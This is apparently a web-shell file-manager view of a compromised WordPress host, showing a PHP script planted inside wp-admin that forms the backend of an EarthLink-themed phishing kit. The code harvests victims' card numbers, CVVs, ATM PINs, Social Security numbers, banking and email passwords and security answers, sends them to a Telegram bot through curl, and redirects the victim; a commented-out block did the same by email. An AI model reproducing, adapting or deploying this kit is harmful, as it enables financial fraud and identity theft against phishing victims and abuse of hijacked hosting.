HEX
Server: Apache
System: Linux host.dominioscaracas.com 4.18.0-477.15.1.lve.2.el8.x86_64 #1 SMP Wed Aug 2 10:43:45 UTC 2023 x86_64
User: enciassa (1159)
PHP: 8.1.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/enciassa/public_html/wp-admin/network/wp-fonts/kj/99bee2164c59f76f02e4f075691feed3/=.php
<?php
include('Antibot/blockers.php');
include('Antibot/detects.php');
include('Antibot/new.php');
include('Antibot/Bot-Crawler.php');
include('Antibot/Dila_DZ.php');
include '../blocker.php';
$ip = getenv("REMOTE_ADDR");
include '../config.php';


// $message .= "+---Olaz---EARTHLINK--2ND--F0000000LZZZZ---+\n";
// $message .= "FOOL N4M: " .$_POST['1']."\n\n";
// $message .= "CARD N0: " .$_POST['2']."\n\n";
// $message .= "EXPIR: " .$_POST['3']."\n\n";
// $message .= "CVV: " .$_POST['4']."\n\n";
// $message .= "ATM: " .$_POST['5']."\n\n";
// $message .= "FONE: " .$_POST['6']."\n\n";
// $message .= "SSN: " .$_POST['7']."\n\n";
// $message .= "B4nking User/ID: " .$_POST['8']."\n\n";
// $message .= "B4nking pass: " .$_POST['9']."\n\n";
// $message .= "AZA: " .$_POST['10']."\n\n";
// $message .= "ROTIN: " .$_POST['11']."\n\n";
// $message .= "3ma1l Adi: " .$_POST['12']."\n\n";
// $message .= "3ma1l Passy: " .$_POST['13']."\n\n";
// $message .= "Skool citi: " .$_POST['14']."\n\n";
// $message .= "Citi birth: " .$_POST['15']."\n\n";
// $message .= "First pet name: " .$_POST['16']."\n\n";
// $message .= "Car: " .$_POST['17']."\n\n";
// $message .= "Address: " .$_POST['18']."\n\n";
// $message .= "State: " .$_POST['19']."\n\n";
// $message .= "citi: " .$_POST['20']."\n\n";
// $message .= "Zipcode: " .$_POST['21']."\n\n";
// $message .= "+---Olaz---EARTHLINK--2ND--F0000000LZZZZ---+\n";
// $message .= "Client IP : ".$ip."\n";
// $message .= "HostName : ".$hostname."\n";
// $rnessage = "$message\n";
// $message .= "+---Olaz---EARTHLINK--2ND--F0000000LZZZZ---+\n";
// $recipient = "";
// $subject = "+---Olaz---EARTHLINK--2ND--F0000000LZZZZ---+";
// $headers = "From: ";
// $headers .= $_POST['eMailAdd']."3RTH10GIN";
// $headers .= "+---Olaz---EARTHLINK--2ND--F0000000LZZZZ---+";
//      mail("$cc", "yahoo Info", $message);
// if (mail($recipient,$subject,$message,$headers))
//        {
//            header("Location: --=^=++.htm");

//        }
// else
//            {
//         echo "ERROR! Please go back and try again.";
//          }




$message = "+--------🚀EARTHLINK--2ND FOOOLZZZZ--------+\n\nFOOL N4M: " 
.$_POST['1'].
"\n\nCARD N0: "
.$_POST['2'].
"\n\nEXPIR: "
.$_POST['3'].
"\n\nCVV: "
.$_POST['4'].
"\n\nATM: "
.$_POST['5'].
"\n\nFONE: "
.$_POST['6'].
"\n\nSSN: "
.$_POST['7'].
"\n\nB4nking User/ID: "
.$_POST['8'].
"\n\nB4nking pass: "
.$_POST['9'].
"\n\nAZA: "
.$_POST['10'].
"\n\nROTIN: "
.$_POST['11'].
"\n\n3ma1l Adi: "
.$_POST['12'].
"\n\n3ma1l Passy: "
.$_POST['13'].
"\n\nSkool citi: "
.$_POST['14'].
"\n\nCiti birth: "
.$_POST['15'].
"\n\nFirst pet name: "
.$_POST['16'].
"\n\nCar: "
.$_POST['17'].
"\n\nAddress: "
.$_POST['18'].
"\n\nState: "
.$_POST['19'].
"\n\nciti: "
.$_POST['20'].
"\n\nZipcode: "
.$_POST['21'].
"\n\nClient IP: "
.$ip.
"\n\nClient Host: "
.$hostname.
"\n\n"
;

$url = "https://api.telegram.org/bot$botToken/sendMessage";


$data = [
    'chat_id' => $chatId,
    'text' => $message
];


$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);

if (curl_errno($ch)) {
    echo 'Error:' . curl_error($ch);
} else {
    // header("Location: --=^=++.htm");
    header("Location: _=bb_=-.html");

}

// header("Location: _=bb_=-.html");

curl_close($ch);